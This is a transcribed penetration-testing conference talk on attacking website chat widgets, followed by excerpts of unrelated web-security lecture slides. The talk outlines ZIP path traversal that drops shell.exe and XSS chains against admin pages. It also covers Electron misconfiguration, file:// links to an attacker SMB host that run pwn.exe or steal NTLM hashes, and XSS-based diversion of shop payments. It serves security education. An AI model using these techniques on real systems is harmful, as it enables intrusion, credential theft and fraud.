Chat with a hacker. Increase attack surface for Pentest. A talk by Egor Karbutov and Alexey Pertsev
|
|
- Amanda Foster
- 6 years ago
- Views:
Transcription
1 Chat with a hacker Increase attack surface for Pentest A talk by Egor Karbutov and Alexey Pertsev
2 $ Whoarewe Egor Karbutov & Alexey Pertsev Penetration Security Speakers Bug Hunters 2
3 Agenda Chats-Chats-Chats How does it works? ZIP old tricks RCE via ZIP So much XSS Electron vulnerability Scheme file:// for your chats Payment through chats Mobile Application Chats 3
4 Disclaimer Chat images are taken for examples All coincidences are accidental 4
5 Chats-Chats-Chats What are you talking about? Another chat? 5
6 Chats-Chats-Chats What are you talking about? Another chat? 6
7 С 7
8 Chat Types Browsers CMS Desktop Application Social Networks Mobile SDK 8
9 Does it help us? Pentest! Increase attack surface Social engineering attacks Vulnerability of own implementations Vendors vulnerability User support is on the local network Lack of segmentation (network) 9
10 Chat for browsers. How does it works? JavaScript CMS = JS 10
11 JavaScript «Privileges» XML HTTP Request Control of user data Cookie Tokens Sensitive information HTML replace Remote update 11
12 Services 12
13 Services 12
14 Services 12
15 Files Social engineering attacks? Will you send an EXE files? We can use a couple of stupid tricks with ZIP 13
16 ZIP Bomb from 2014 :) 42 Kb 24 Gb? 322 Gb? 132 Tb? 4.5 Pb 14
17 ZIP Format 15
18 ZIP Traversal 16
19 api.servise.test Let s send a file User interface Operator standalone program storage.servise.test 17
20 api.servise.test Let s send a file User interface Operator standalone program Sending the file storage.servise.test cat.png 17
21 api.servise.test Let s send a file User interface Operator standalone program Sending the file storage.servise.test cat.png cat.png == id 17
22 api.servise.test Let s send a file User interface File Message file_path= /file/id Sending the file storage.servise.test Operator standalone program cat.png cat.png == id 17
23 api.servise.test Let s send a file User interface File Message file_path= /file/id File Message file_path= /file/id Operator standalone program Sending the file storage.servise.test cat.png cat.png == id 17
24 api.servise.test Let s send a file User interface File Message file_path= /file/id File Message file_path= /file/id Operator standalone program Sending the file storage.servise.test Concat( file_path); cat.png cat.png == id 17
25 api.servise.test Let s send a file User interface File Message file_path= /file/id File Message file_path= /file/id Operator standalone program Sending the file cat.png storage.servise.test cat.png == id Download file Concat( file_path); GET /file/id HTTP/1.1 Host: storage.service.test 17
26 api.servise.test Let s send a file User interface File Message file_path= /file/id File Message file_path= /file/id Operator standalone program %Downloads%/cat.png Sending the file cat.png storage.servise.test cat.png == id Download file Concat( file_path); GET /file/id HTTP/1.1 Host: storage.service.test 17
27 RCE via File api.servise.test User interface Operator standalone program 18
28 RCE via File api.servise.test User interface Operator standalone program Sending the file cat.png 18
29 RCE via File api.servise.test User interface File Message file_path =.hacker.site/file/id Operator standalone program Sending the file cat.png 18
30 RCE via File api.servise.test User interface File Message file_path =.hacker.site/file/id File Message file_path =.hacker.test/file/id Operator standalone program Sending the file cat.png 18
31 RCE via File api.servise.test User interface File Message file_path =.hacker.site/file/id File Message file_path =.hacker.test/file/id Operator standalone program Sending the file Concat( file_path); cat.png 18
32 RCE via File api.servise.test User interface File Message file_path =.hacker.site/file/id File Message file_path =.hacker.test/file/id Operator standalone program storage.servise.test.hacke.site Sending the file Concat( file_path); cat.png 18
33 RCE via File api.servise.test User interface File Message file_path =.hacker.site/file/id File Message file_path =.hacker.test/file/id Operator standalone program storage.servise.test.hacke.site Sending the file Concat( file_path); cat.png../../../../../../../shell.exe == id 18
34 RCE via File api.servise.test User interface File Message file_path =.hacker.site/file/id File Message file_path =.hacker.test/file/id Operator standalone program storage.servise.test.hacke.site Sending the file Download file Concat( file_path); GET /file/id HTTP/1.1 Host: storage.service.test.hacke.site cat.png../../../../../../../shell.exe == id 18
35 RCE via File api.servise.test User interface File Message file_path =.hacker.site/file/id File Message file_path =.hacker.test/file/id Operator standalone program %Downloads%/shell.exe storage.servise.test.hacke.site Sending the file Download file Concat( file_path); GET /file/id HTTP/1.1 Host: storage.service.test.hacke.site cat.png../../../../../../../shell.exe == id 18
36 XSS XSS is the maximum impact High level of message security Not obvious places Headers GET/POST parameters for analytics Our target is Admin page or statistic page 19
37 Headers for XSS User-Agent Referrer Cookie Origin Custom Headers 20
38 Parameters for XSS Methods GET POST WebSocket Keep it simple. Use gray box analysis! 21
39 Admin & Statistic Page Waiting for someone to visit this page Abuse of complaints against administrators 22
40 The sad consequences XSS into chat settings Appearance customisation Fonts Labels Color Image etc 23
41 Attack scheme 1 Evil Hacker pentest_client.shop.test 24
42 Attack scheme 1 Evil Hacker pentest_client.shop.test XSS attack on chat 24
43 Attack scheme 1 Evil Hacker pentest_client.shop.test statistic_vendor.chat.test admin_vendor.chat.test XSS attack on chat 24
44 Attack scheme 1 Evil Hacker XSS attack on chat pentest_client.shop.test XSS attack on client admins statistic_vendor.chat.test admin_vendor.chat.test 24
45 Attack scheme 1 Evil Hacker XSS attack on chat pentest_client.shop.test XSS attack on client admins statistic_vendor.chat.test admin_vendor.chat.test 24
46 Attack scheme 1 Evil Hacker XSS attack on chat pentest_client.shop.test XSS attack on client admins statistic_vendor.chat.test admin_vendor.chat.test JS code injection into chat settings 24
47 Attack scheme 1 Evil Hacker XSS attack on chat pentest_client.shop.test XSS attack on client admins statistic_vendor.chat.test admin_vendor.chat.test JS code injection into chat settings XSS from any user on the site 24
48 Attack scheme 1 Evil Hacker XSS attack on chat pentest_client.shop.test XSS attack on client admins statistic_vendor.chat.test admin_vendor.chat.test pentest_client.shop.test JS code injection into chat settings XSS from any user on the site 24
49 Attack scheme 2 Evil Hacker chat.vendor statistic.chat.vendor admin.chat.vendor 25
50 Attack scheme 2 Evil Hacker chat.vendor statistic.chat.vendor admin.chat.vendor XSS attack on chat 25
51 Attack scheme 2 Evil Hacker XSS attack on chat chat.vendor XSS attack on vendor admins statistic.chat.vendor admin.chat.vendor 25
52 Attack scheme 2 Evil Hacker XSS attack on chat chat.vendor XSS attack on vendor admins statistic.chat.vendor admin.chat.vendor 25
53 Attack scheme 2 Evil Hacker XSS attack on chat chat.vendor XSS attack on vendor admins statistic.chat.vendor admin.chat.vendor JS code injection into chat settings 25
54 Attack scheme 2 Evil Hacker XSS attack on chat chat.vendor XSS attack on vendor admins statistic.chat.vendor admin.chat.vendor JS code injection into chat settings XSS from any user on the site 25
55 Attack scheme 2 Evil Hacker XSS attack on chat chat.vendor XSS attack on vendor admins statistic.chat.vendor admin.chat.vendor chat.vendor XSS from any user on the site JS code injection into chat settings 25
56 Attack scheme 2 Evil Hacker XSS attack on chat chat.vendor XSS attack on vendor admins statistic.chat.vendor admin.chat.vendor XSS from any user on chat clients chat.vendor XSS from any user on the site JS code injection into chat settings 25
57 Attack scheme 2 Evil Hacker XSS attack on chat chat.vendor XSS attack on vendor admins statistic.chat.vendor admin.chat.vendor statistic_vendor.chat.test admin_vendor.chat.test chat.test All chat clients services XSS from any user on chat clients chat.vendor XSS from any user on the site JS code injection into chat settings 25
58 Electron OpenSource framework to build desktop apps using HTML, CSS and JavaScript Electron accomplishes this by combining Chromium and Node.js into a single runtime Chats vendor use Electron for admin desktop applications 26
59 Electron Threat Model Electron Threat Model = Browser Threat Model Untrusted content from the web SOP Bypass Control whether access to Node.js primitives is allowed from JavaScript Potential access to Node.js primitives Limited sandbox XSS == RCE
60 Electron sandbox bypass nodeintegration = true Electron
61 Electron sandbox bypass nodeintegration = true Misconfiguration SOP bypass via presence of privileged URLs Switch false 29
62 File:// Typically used to retrieve files from networks and local disks Vulnerability in the wild Local File Inclusion XXE SSRF Windows context NTLM Hash Stealing NTLM Relay RCE 30
63 Chats with File:// Admin desktop application for Windows Available scheme file:// Scheme file:// like hyperlink 31
64 Chats with File:// Pentest in local network RCE on client device and servers Weakness & duplicate passwords (local services, servers, client devices) pentest_client.shop.test Send file:// link Admin desktop application Send NTLM hash Hacker SMB Hash Cracking file://hacker.test/ SMB Relay 32
65 Tricks with File:// 1 What can we do? File:// with local files file://c:/windows/system32/calc.exe But we can t use arguments file://c:/windows/system32/cmd.exe /C calc All symbols in file link is a path It is only for social engineering attacks You can combine this with dir traversal ZIP trick 33
66 Tricks with File:// 2 File:// with execute files from the Internet (Hacker SMB server) file://internet_ip/pwn.exe 34
67 Chats with File:// Pentest internet service and local network RCE on client device Social engineering attacks + file://local_files Admin OS pentest_client.shop.test Send file:// link on execute file file://hacker.test/shell.exe Admin desktop application Download shell.exe Hacker SMB Executing shell.exe Clicking on the link 35
68 Tricks with File:// 3 How to bypass Windows alert window? This file is in a location outside your local network Easy, I ll use local addresses No, it isn t work 36
69 Tricks with File:// 3 Local network from OS Windows is servers with NetBios name NetBios name - Domain names without dot If I ll use NetBios name netbios instead of local IP, I can bypass that alert file://netbios/pwn.exe How? Smbd (samba) server + responder d netbios I eth0 Working only in local networks 37
70 Chats with File:// NetBios name trick in local network Without alert window Admin OS pentest_client.shop.test Send file:// link on execute file file://netbios/pwn.exe Admin desktop application Download shell.exe Hacker SMB Executing shell.exe Clicking on the link 38
71 Add payment system Useful? Be careful to store a configs! 39
72 Hacker can buy IPhone for free Shop backend 40
73 Hacker can buy IPhone for free POST /pay?params=1 shopid customer sum item Shop backend 40
74 Hacker can buy IPhone for free POST /pay?params=1 Shop backend shopid customer sum item Redirect to payment page 40
75 Hacker can buy IPhone for free POST /pay?params=1 shopid customer sum item Redirect to payment page YES checkurl Shop backend 40
76 Hacker can buy IPhone for free Shop backend POST /pay?params=1 shopid customer sum item Redirect to payment page YES checkurl Evil Hacker 40
77 Hacker can buy IPhone for free Shop backend POST /pay?params=1 shopid customer sum item Redirect to payment page YES checkurl IPhone X avisourl Evil Hacker 40
78 Stealing money for hackers POST /pay?params=1 shopid customer sum item Steps to take profit: Register own shop with similar name Change shopid via XSS Call checkurl and avisourl as needed All payments for hackers! Protection: Check Yandex Ips Add anti-csrf token for config form DO NOT SHOW ANY PASSWORDS EVER 41
79 Mobile Application SDK Custom code for native applications All code have only one privileges in Mobile OS 3rd party applications have full access in your app Change the user interface Access to local files in folder app Access to dynamic user data Change logic app (like tapjacking) Vulnerability Custom implementation WebView JS manipulation (Android) 42
80 ExpensiveWall ExpensiveWall is spread to different apps as an SDK called gtk, ExpensiveWall sends data about the infected device to its C&C server, including its location and unique identifiers, such as MAC and IP addresses, IMSI, and IMEI. Total Downloads infected applications = 5,904,
81 Don t forget about Farms that overestimate the rating of applications Dynamic code execution and code update JSPatch ios Android Runtime Valid Ad that were vulnerable Application with fake (Ad) SDK Code review custom SDK code 44
82 Conclusion For pentest and red team Increase your attack surface via 3rd party services and program library For you and your project Think how much you trust other people s implementations, applications in your devices, plugins in your program Don t forget about code review! All vulnerability are reported and fixed 45
83 Questions? Egor Alexey Pertsev
Man-In-The-Browser Attacks. Daniel Tomescu
Man-In-The-Browser Attacks Daniel Tomescu 1 About me Work and education: Pentester @ KPMG Romania Moderator @ Romanian Security Team MSc. Eng. @ University Politehnica of Bucharest OSCP, CREST CRT Interests:
More informationWEB SECURITY WORKSHOP TEXSAW Presented by Solomon Boyd and Jiayang Wang
WEB SECURITY WORKSHOP TEXSAW 2014 Presented by Solomon Boyd and Jiayang Wang Introduction and Background Targets Web Applications Web Pages Databases Goals Steal data Gain access to system Bypass authentication
More informationC1: Define Security Requirements
OWASP Top 10 Proactive Controls IEEE Top 10 Software Security Design Flaws OWASP Top 10 Vulnerabilities Mitigated OWASP Mobile Top 10 Vulnerabilities Mitigated C1: Define Security Requirements A security
More informationHow to implement SDL and don t turn gray. Andrey Kovalev, Security Engineer
How to implement SDL and don t turn gray Andrey Kovalev, Security Engineer Agenda SDL 101 Yandex approach SAST, DAST, FSR: drawbacks and solutions Summary 3 How to implement SDL and don t turn gray SDL
More informationApplication security : going quicker
Application security : going quicker The web application firewall example Agenda Agenda o Intro o Application security o The dev team approach o The infra team approach o Impact of the agility o The WAF
More informationAttacks Against Websites 3 The OWASP Top 10. Tom Chothia Computer Security, Lecture 14
Attacks Against Websites 3 The OWASP Top 10 Tom Chothia Computer Security, Lecture 14 OWASP top 10. The Open Web Application Security Project Open public effort to improve web security: Many useful documents.
More informationProvide you with a quick introduction to web application security Increase you awareness and knowledge of security in general Show you that any
OWASP Top 10 Provide you with a quick introduction to web application security Increase you awareness and knowledge of security in general Show you that any tester can (and should) do security testing
More informationInformation Security CS 526 Topic 8
Information Security CS 526 Topic 8 Web Security Part 1 1 Readings for This Lecture Wikipedia HTTP Cookie Same Origin Policy Cross Site Scripting Cross Site Request Forgery 2 Background Many sensitive
More informationOWASP Top 10 The Ten Most Critical Web Application Security Risks
OWASP Top 10 The Ten Most Critical Web Application Security Risks The Open Web Application Security Project (OWASP) is an open community dedicated to enabling organizations to develop, purchase, and maintain
More informationCopyright
1 Security Test EXTRA Workshop : ANSWER THESE QUESTIONS 1. What do you consider to be the biggest security issues with mobile phones? 2. How seriously are consumers and companies taking these threats?
More informationThe Way of the Bounty. by David Sopas
The Way of the Bounty by David Sopas (@dsopas) ./whoami Security Consultant for Checkmarx Security Team Leader for Char49 Disclosed more than 50 security advisories Founder of WebSegura.net Love to hack
More informationWeb Vulnerabilities. And The People Who Love Them
Web Vulnerabilities And The People Who Love Them Me Tom Hudson Technical Trainer at Sky Betting & Gaming TomNomNom online Occasional bug hunter Lover of analogies Lover of questions Insecure Direct Object
More informationApplication Security through a Hacker s Eyes James Walden Northern Kentucky University
Application Security through a Hacker s Eyes James Walden Northern Kentucky University waldenj@nku.edu Why Do Hackers Target Web Apps? Attack Surface A system s attack surface consists of all of the ways
More informationIntroduction into browser hacking. Andrey Kovalev
Introduction into browser hacking Andrey Kovalev (@L1kvID) Who am I Security Engineer at Yandex Browser security enthusiast Public speaker (every ZeroNights since 2015) Author of @br0wsec channel (https://t.me/br0wsec)!3
More informationOverview Cross-Site Scripting (XSS) Christopher Lam Introduction Description Programming Languages used Types of Attacks Reasons for XSS Utilization Attack Scenarios Steps to an XSS Attack Compromises
More informationExcerpts of Web Application Security focusing on Data Validation. adapted for F.I.S.T. 2004, Frankfurt
Excerpts of Web Application Security focusing on Data Validation adapted for F.I.S.T. 2004, Frankfurt by fs Purpose of this course: 1. Relate to WA s and get a basic understanding of them 2. Understand
More informationWeb Application with AJAX. Kateb, Faris; Ahmed, Mohammed; Alzahrani, Omar. University of Colorado, Colorado Springs
Web Application with AJAX Kateb, Faris; Ahmed, Mohammed; Alzahrani, Omar University of Colorado, Colorado Springs CS 526 Advanced Internet and Web Systems Abstract Asynchronous JavaScript and XML or Ajax
More informationAbusing Windows Opener to Bypass CSRF Protection (Never Relay On Client Side)
Abusing Windows Opener to Bypass CSRF Protection (Never Relay On Client Side) Narendra Bhati @NarendraBhatiB http://websecgeeks.com Abusing Windows Opener To Bypass CSRF Protection Narendra Bhati Page
More informationPHP Security. Kevin Schroeder Zend Technologies. Copyright 2007, Zend Technologies Inc.
PHP Security Kevin Schroeder Zend Technologies Copyright 2007, Zend Technologies Inc. Disclaimer Do not use anything you learn here for nefarious purposes Why Program Securely? Your job/reputation depends
More informationYour Turn to Hack the OWASP Top 10!
OWASP Top 10 Web Application Security Risks Your Turn to Hack OWASP Top 10 using Mutillidae Born to Be Hacked Metasploit in VMWare Page 1 https://www.owasp.org/index.php/main_page The Open Web Application
More informationWeb Application Security. Philippe Bogaerts
Web Application Security Philippe Bogaerts OWASP TOP 10 3 Aim of the OWASP Top 10 educate developers, designers, architects and organizations about the consequences of the most common web application security
More informationRKN 2015 Application Layer Short Summary
RKN 2015 Application Layer Short Summary HTTP standard version now: 1.1 (former 1.0 HTTP /2.0 in draft form, already used HTTP Requests Headers and body counterpart: answer Safe methods (requests): GET,
More informationInformation Security CS 526 Topic 11
Information Security CS 526 Topic 11 Web Security Part 1 1 Readings for This Lecture Wikipedia HTTP Cookie Same Origin Policy Cross Site Scripting Cross Site Request Forgery 2 Background Many sensitive
More informationDon t blink or how to create secure software. Bozhidar Bozhanov, LogSentinel
Don t blink or how to create secure software Bozhidar Bozhanov, CEO @ LogSentinel About me Senior software engineer and architect Founder & CEO @ LogSentinel Former IT and e-gov advisor to the deputy prime
More informationSecurity. CSC309 TA: Sukwon Oh
Security CSC309 TA: Sukwon Oh Outline SQL Injection NoSQL Injection (MongoDB) Same Origin Policy XSSI XSS CSRF (XSRF) SQL Injection What is SQLI? Malicious user input is injected into SQL statements and
More informationFeaturing. and. Göteborg. Ulf Larson Thursday, October 24, 13
Featuring and Göteborg OWASP top ten 2013 Based on risk data from eight firms that specialize in application security, This data spans over 500,000 vulnerabilities across hundreds of organizations and
More informationContent Security Policy
About Tim Content Security Policy New Tools for Fighting XSS Pentester > 10 years Web Applications Network Security Products Exploit Research Founded Blindspot Security in 2014 Pentesting Developer Training
More informationDEFENSIVE PROGRAMMING. Lecture for EDA 263 Magnus Almgren Department of Computer Science and Engineering Chalmers University of Technology
DEFENSIVE PROGRAMMING Lecture for EDA 263 Magnus Almgren Department of Computer Science and Engineering Chalmers University of Technology Traditional Programming When writing a program, programmers typically
More informationCompTIA. PT0-001 EXAM CompTIA PenTest+ Certification Exam Product: Demo. m/
Page No 1 https://www.dumpsplanet.com m/ CompTIA PT0-001 EXAM CompTIA PenTest+ Certification Exam Product: Demo For More Information: PT0-001-dumps Page No 2 Question: 1 During a penetration test, a tester
More informationChrome Extension Security Architecture
Chrome Extension Security Architecture Presenter: Jienan Liu Network, Intelligence & security Lab outline Chrome extension introduction Threats towards extension Chrome extension s security architecture
More informationP2_L12 Web Security Page 1
P2_L12 Web Security Page 1 Reference: Computer Security by Stallings and Brown, Chapter (not specified) The web is an extension of our computing environment, because most of our daily tasks involve interaction
More informationMTAT Research Seminar in Cryptography The Security of Mozilla Firefox s Extensions
MTAT.07.019 Research Seminar in Cryptography The Security of Mozilla Firefox s Extensions Kristjan Krips 1 Introduction Mozilla Firefox has 24.05% of the recorded usage share of web browsers as of October
More informationMatch the attack to its description:
Match the attack to its description: 8 7 5 6 4 2 3 1 Attacks: Using Components with Known Vulnerabilities Missing Function Level Access Control Sensitive Data Exposure Security Misconfiguration Insecure
More informationOWASP Top 10 Risks. Many thanks to Dave Wichers & OWASP
OWASP Top 10 Risks Dean.Bushmiller@ExpandingSecurity.com Many thanks to Dave Wichers & OWASP My Mom I got on the email and did a google on my boy My boy works in this Internet thing He makes cyber cafes
More informationJohn Coggeshall Copyright 2006, Zend Technologies Inc.
PHP Security Basics John Coggeshall Copyright 2006, Zend Technologies Inc. Welcome! Welcome to PHP Security Basics Who am I: John Coggeshall Lead, North American Professional Services PHP 5 Core Contributor
More informationApplication vulnerabilities and defences
Application vulnerabilities and defences In this lecture We examine the following : SQL injection XSS CSRF SQL injection SQL injection is a basic attack used to either gain unauthorized access to a database
More informationCSC 482/582: Computer Security. Cross-Site Security
Cross-Site Security 8chan xss via html 5 storage ex http://arstechnica.com/security/2015/09/serious- imgur-bug-exploited-to-execute-worm-like-attack-on- 8chan-users/ Topics 1. Same Origin Policy 2. Credential
More informationMavituna Security Ltd. Finance House, 522A Uxbridge Rd. Pinner. HA5 3PU / UK
Netsparker is the first false positive free scanner. In this document you can see the details of features, how to use them and how to tweak Netsparker. If you can t find what you are looking for, please
More informationSecurity Testing. - a requirement for a secure business. ISACA DAY in SOFIA. Gabriel Mihai Tanase, Director, Cyber Services KPMG in CEE
Gabriel Mihai Tanase, Director, Cyber Services KPMG in CEE Cyber Security Services Security Testing - a requirement for a secure business ISACA DAY in SOFIA Agenda No Agenda Some minimum theory More real
More informationWelcome to the OWASP TOP 10
Welcome to the OWASP TOP 10 Secure Development for Java Developers Dominik Schadow 03/20/2012 BASEL BERN LAUSANNE ZÜRICH DÜSSELDORF FRANKFURT A.M. FREIBURG I.BR. HAMBURG MÜNCHEN STUTTGART WIEN 1 AGENDA
More informationHacker Attacks on the Horizon: Web 2.0 Attack Vectors
IBM Software Group Hacker Attacks on the Horizon: Web 2.0 Attack Vectors Danny Allan Director, Security Research dallan@us.ibm.com 2/21/2008 Agenda HISTORY Web Eras & Trends SECURITY Web 2.0 Attack Vectors
More informationProtect your apps and your customers against application layer attacks
Protect your apps and your customers against application layer attacks Development 1 IT Operations VULNERABILITY DETECTION Bots, hackers, and other bad actors will find and exploit vulnerabilities in web
More informationTHREAT MODELING IN SOCIAL NETWORKS. Molulaqhooa Maoyi Rotondwa Ratshidaho Sanele Macanda
THREAT MODELING IN SOCIAL NETWORKS Molulaqhooa Maoyi Rotondwa Ratshidaho Sanele Macanda INTRODUCTION Social Networks popular web service. 62% adults worldwide use social media 65% of world top companies
More informationGUI based and very easy to use, no security expertise required. Reporting in both HTML and RTF formats - Click here to view the sample report.
Report on IRONWASP Software Product: IronWASP Description of the Product: IronWASP (Iron Web application Advanced Security testing Platform) is an open source system for web application vulnerability testing.
More informationIs Browsing Safe? Web Browser Security. Subverting the Browser. Browser Security Model. XSS / Script Injection. 1. XSS / Script Injection
Is Browsing Safe? Web Browser Security Charlie Reis Guest Lecture - CSE 490K - 5/24/2007 Send Spam Search Results Change Address? Install Malware Web Mail Movie Rentals 2 Browser Security Model Pages are
More informationDreamFactory Security Guide
DreamFactory Security Guide This white paper is designed to provide security information about DreamFactory. The sections below discuss the inherently secure characteristics of the platform and the explicit
More informationComputer Security CS 426 Lecture 41
Computer Security CS 426 Lecture 41 StuxNet, Cross Site Scripting & Cross Site Request Forgery CS426 Fall 2010/Lecture 36 1 StuxNet: Overview Windows-based Worm First reported in June 2010, the general
More informationWeb Security. Jace Baker, Nick Ramos, Hugo Espiritu, Andrew Le
Web Security Jace Baker, Nick Ramos, Hugo Espiritu, Andrew Le Topics Web Architecture Parameter Tampering Local File Inclusion SQL Injection XSS Web Architecture Web Request Structure Web Request Structure
More informationApplication Layer Attacks. Application Layer Attacks. Application Layer. Application Layer. Internet Protocols. Application Layer.
Application Layer Attacks Application Layer Attacks Week 2 Part 2 Attacks Against Programs Application Layer Application Layer Attacks come in many forms and can target each of the 5 network protocol layers
More informationThe security of Mozilla Firefox s Extensions. Kristjan Krips
The security of Mozilla Firefox s Extensions Kristjan Krips Topics Introduction The extension model How could extensions be used for attacks - website defacement - phishing attacks - cross site scripting
More informationCSE361 Web Security. Attacks against the client-side of web applications. Nick Nikiforakis
CSE361 Web Security Attacks against the client-side of web applications Nick Nikiforakis nick@cs.stonybrook.edu Despite the same origin policy Many things can go wrong at the client-side of a web application
More informationCommon Websites Security Issues. Ziv Perry
Common Websites Security Issues Ziv Perry About me Mitnick attack TCP splicing Sql injection Transitive trust XSS Denial of Service DNS Spoofing CSRF Source routing SYN flooding ICMP
More informationHuman vs Artificial intelligence Battle of Trust
Human vs Artificial intelligence Battle of Trust Hemil Shah Co-CEO & Director Blueinfy Solutions Pvt Ltd About Hemil Shah hemil@blueinjfy.net Position -, Co-CEO & Director at BlueInfy Solutions, - Founder
More informationBrowser code isolation
CS 155 Spring 2016 Browser code isolation John Mitchell Acknowledgments: Lecture slides are from the Computer Security course taught by Dan Boneh and John Mitchell at Stanford University. When slides are
More informationAll the Cool Kids Are Red Teaming Should You Be Drinking the Kool-aid Too?
All the Cool Kids Are Red Teaming Should You Be Drinking the Kool-aid Too? Exploring Different Approaches to Penetration Testing Cara Marie NCC Group ISSA-LA Aug 2017 Obligatory About Me NCC Group Principal
More informationSecurity+ Guide to Network Security Fundamentals, Third Edition. Chapter 3 Protecting Systems
Security+ Guide to Network Security Fundamentals, Third Edition Chapter 3 Protecting Systems Objectives Explain how to harden operating systems List ways to prevent attacks through a Web browser Define
More informationCNIT 129S: Securing Web Applications. Ch 10: Attacking Back-End Components
CNIT 129S: Securing Web Applications Ch 10: Attacking Back-End Components Injecting OS Commands Web server platforms often have APIs To access the filesystem, interface with other processes, and for network
More informationApplications Security
Applications Security OWASP Top 10 PyCon Argentina 2018 Objectives Generate awareness and visibility on web-apps security Set a baseline of shared knowledge across the company Why are we here / Trigger
More informationW e b A p p l i c a t i o n S e c u r i t y : T h e D e v i l i s i n t h e D e t a i l s
W e b A p p l i c a t i o n S e c u r i t y : T h e D e v i l i s i n t h e D e t a i l s Session I of III JD Nir, Security Analyst Why is this important? ISE Proprietary Agenda About ISE Web Applications
More informationHTML5 a clear & present danger
HTML5 a clear & present danger Renaud Bidou CTO 1/29/2014 Deny All 2012 1 1/29/2014 Deny All 2013 1 Menu 1. HTML5 new capabilities 2. HTML5 tricks 3. Empowering common threats 4. Hackers dreams come true
More informationPROBLEMS IN PRACTICE: THE WEB MICHAEL ROITZSCH
Faculty of Computer Science Institute of Systems Architecture, Operating Systems Group PROBLEMS IN PRACTICE: THE WEB MICHAEL ROITZSCH THE WEB AS A DISTRIBUTED SYSTEM 2 WEB HACKING SESSION 3 3-TIER persistent
More informationKenna Platform Security. A technical overview of the comprehensive security measures Kenna uses to protect your data
Kenna Platform Security A technical overview of the comprehensive security measures Kenna uses to protect your data V3.0, MAY 2017 Multiple Layers of Protection Overview Password Salted-Hash Thank you
More informationWEB SECURITY: XSS & CSRF
WEB SECURITY: XSS & CSRF CMSC 414 FEB 22 2018 Cross-Site Request Forgery (CSRF) URLs with side-effects http://bank.com/transfer.cgi?amt=9999&to=attacker GET requests should have no side-effects, but often
More informationXSSFor the win! What can be really done with Cross-Site Scripting.
XSSFor the win! What can be really done with Cross-Site Scripting by @brutelogic Whoami Security Researcher at Sucuri Security (a GoDaddy company) XSS, filter/waf bypass and bash! Helped to fix more than
More informationApplication Security Introduction. Tara Gu IBM Product Security Incident Response Team
Application Security Introduction Tara Gu IBM Product Security Incident Response Team About Me - Tara Gu - tara.weiqing@gmail.com - Duke B.S.E Biomedical Engineering - Duke M.Eng Computer Engineering -
More informationCombating Common Web App Authentication Threats
Security PS Combating Common Web App Authentication Threats Bruce K. Marshall, CISSP, NSA-IAM Senior Security Consultant bmarshall@securityps.com Key Topics Key Presentation Topics Understanding Web App
More informationSecurity. SWE 432, Fall 2017 Design and Implementation of Software for the Web
Security SWE 432, Fall 2017 Design and Implementation of Software for the Web Today Security What is it? Most important types of attacks Authorization oauth 2 Security Why is it important? Users data is
More informationBase64 The Security Killer
Base64 The Security Killer Kevin Fiscus NWN Corporation Session ID: DAS-203 Session Classification: Intermediate A Short (Made Up) Security Story Helix Pharmaceuticals is concerned about security Industrial
More informationMWR InfoSecurity Advisory. 26 th April Elastic Path Administrative. Quit. Session Hijacking through Embedded XSS
Quit MWR InfoSecurity Advisory Elastic Path Administrative Session Hijacking through Embedded XSS 26 th April 2007 2007-04-26 1 of 7 INDEX 1 Detailed Vulnerability description...4 1.1 Introduction...4
More informationLet me secure that for you!
Let me secure that for you! Appsec AU, 9 Sept 2017 Kirk Jackson @kirkj lmstfu.com @LetMeSecureThat This talk is not about RedShield! We are the world's first web application shielding-with-a-service cybersecurity
More informationRobust Defenses for Cross-Site Request Forgery
University of Cyprus Department of Computer Science Advanced Security Topics Robust Defenses for Cross-Site Request Forgery Name: Elena Prodromou Instructor: Dr. Elias Athanasopoulos Authors: Adam Barth,
More informationPenetration Testing following OWASP. Boyan Yanchev Chief Technology Ofcer Peter Dimkov IS Consultant
Penetration Testing following OWASP Boyan Yanchev Chief Technology Ofcer Peter Dimkov IS Consultant За Лирекс Penetration testing A method of compromising the security of a computer system or network by
More informationExecutive Summary. Flex Bounty Program Overview. Bugcrowd Inc Page 2 of 7
CANVAS by Instructure Bugcrowd Flex Program Results December 01 Executive Summary Bugcrowd Inc was engaged by Instructure to perform a Flex Bounty program, commonly known as a crowdsourced penetration
More informationHybrid App Security Attack and Defense
标题文本» 正文级别 1 正文级别 2 正文级别 3 正文级别 4» 正文级别 5 Hybrid App Security Attack and Defense HuiYu Wu @ Tencent Security Platform Department About Me Security researcher at Tencent Security Platform Department Focus
More informationOWASP Top David Caissy OWASP Los Angeles Chapter July 2017
OWASP Top 10-2017 David Caissy OWASP Los Angeles Chapter July 2017 About Me David Caissy Web App Penetration Tester Former Java Application Architect IT Security Trainer: Developers Penetration Testers
More informationSECURITY TRENDS & VULNERABILITIES REVIEW WEB APPLICATIONS
SECURITY TRENDS & VULNERABILITIES REVIEW WEB APPLICATIONS Contents Introduction...3 1. Research Methodology...4 2. Executive Summary...5 3. Participant Portrait...6 4. Vulnerability Statistics...8 4.1.
More informationSichere Software vom Java-Entwickler
Sichere Software vom Java-Entwickler Dominik Schadow Java Forum Stuttgart 05.07.2012 BASEL BERN LAUSANNE ZÜRICH DÜSSELDORF FRANKFURT A.M. FREIBURG I.BR. HAMBURG MÜNCHEN STUTTGART WIEN We can no longer
More informationExploiting and Defending: Common Web Application Vulnerabilities
Exploiting and Defending: Common Web Application Vulnerabilities Introduction: Steve Kosten Principal Security Consultant SANS Instructor Denver OWASP Chapter Lead Certifications CISSP, GWAPT, GSSP-Java,
More informationApplication. Security. on line training. Academy. by Appsec Labs
Application Security on line training Academy by Appsec Labs APPSEC LABS ACADEMY APPLICATION SECURITY & SECURE CODING ON LINE TRAINING PROGRAM AppSec Labs is an expert application security company serving
More information(System) Integrity attacks System Abuse, Malicious File upload, SQL Injection
Pattern Recognition and Applications Lab (System) Integrity attacks System Abuse, Malicious File upload, SQL Injection Igino Corona igino.corona (at) diee.unica.it Computer Security April 9, 2018 Department
More informationWHY CSRF WORKS. Implicit authentication by Web browsers
WHY CSRF WORKS To explain the root causes of, and solutions to CSRF attacks, I need to share with you the two broad types of authentication mechanisms used by Web applications: 1. Implicit authentication
More informationCNIT 129S: Securing Web Applications. Ch 3: Web Application Technologies
CNIT 129S: Securing Web Applications Ch 3: Web Application Technologies HTTP Hypertext Transfer Protocol (HTTP) Connectionless protocol Client sends an HTTP request to a Web server Gets an HTTP response
More informationOWASP Top 10. Copyright 2017 Ergon Informatik AG 2/13
Airlock and the OWASP TOP 10-2017 Version 2.1 11.24.2017 OWASP Top 10 A1 Injection... 3 A2 Broken Authentication... 5 A3 Sensitive Data Exposure... 6 A4 XML External Entities (XXE)... 7 A5 Broken Access
